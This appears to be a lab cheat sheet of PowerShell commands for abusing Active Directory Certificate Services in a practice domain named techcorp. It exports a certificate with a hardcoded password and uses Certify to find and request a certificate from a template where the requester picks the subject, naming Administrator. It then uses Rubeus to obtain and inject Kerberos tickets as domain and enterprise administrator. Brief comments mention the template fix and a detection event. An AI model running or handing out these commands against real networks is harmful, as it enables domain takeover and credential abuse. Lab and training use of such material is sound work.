Active Directory Certificate Services (AD CS)

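Export a certificate with its private key from the local machine store (this only works when the key is marked exportable):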

PS> ls cert:\LocalMachine\My
PS> ls cert:\LocalMachine\My\BAD78F43BB4CB13C4843E49B51AA051530FFBBDB | Export-PfxCertificate -FilePath C:\Users\Public\pawadmin.pfx -Password (ConvertTo-SecureString -String 'SecretPass@123' -Force -AsPlainText)

Enumerate AD CS (don't use InvisiShell):

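# look for a certificate template that has ENROLLEE_SUPPLIES_SUBJECT set and grants enrollment rights to a user you control
# (that combination lets the requester pick the certificate subject; the fix is to clear the flag or restrict enrollment rights on the template)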
PS> C:\AD\Tools\Certify.exe cas
PS> C:\AD\Tools\Certify.exe find
PS> C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject
 
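# now use the exported pawadmin.pfx to get a TGT as pawadmin (certificate-based Kerberos logon)
# note: the export above wrote to C:\Users\Public; this path assumes the file was copied to C:\AD\Tools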
PS> C:\AD\Tools\Rubeus.exe asktgt /user:pawadmin /certificate:C:\AD\Tools\pawadmin.pfx /password:SecretPass@123 /nowrap /ptt
 
PS> C:\AD\Tools\Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator
 
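# Certify returns the issued certificate and private key as PEM text; save it as cert.pem and convert it to PFX before Rubeus can load it
# (openssl prompts for the export password, which is the /password value used below)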
PS> C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\DA.pfx
 
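# use the converted certificate to get a TGT as the domain Administrator
# (the DC logs this as a 4768 event that includes the certificate issuer, serial number and thumbprint)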
PS> C:\AD\Tools\Rubeus.exe asktgt /user:Administrator /certificate:C:\AD\Tools\DA.pfx /password:SecretPass@123 /nowrap /ptt
 
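# same step for enterprise admin, against techcorp-dc.techcorp.local
# note: EA.pfx is a separate certificate; the commands above only produce DA.pfx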
PS> C:\AD\Tools\Rubeus.exe asktgt /user:techcorp.local\Administrator /dc:techcorp-dc.techcorp.local /certificate:C:\AD\Tools\EA.pfx /password:SecretPass@123 /nowrap /ptt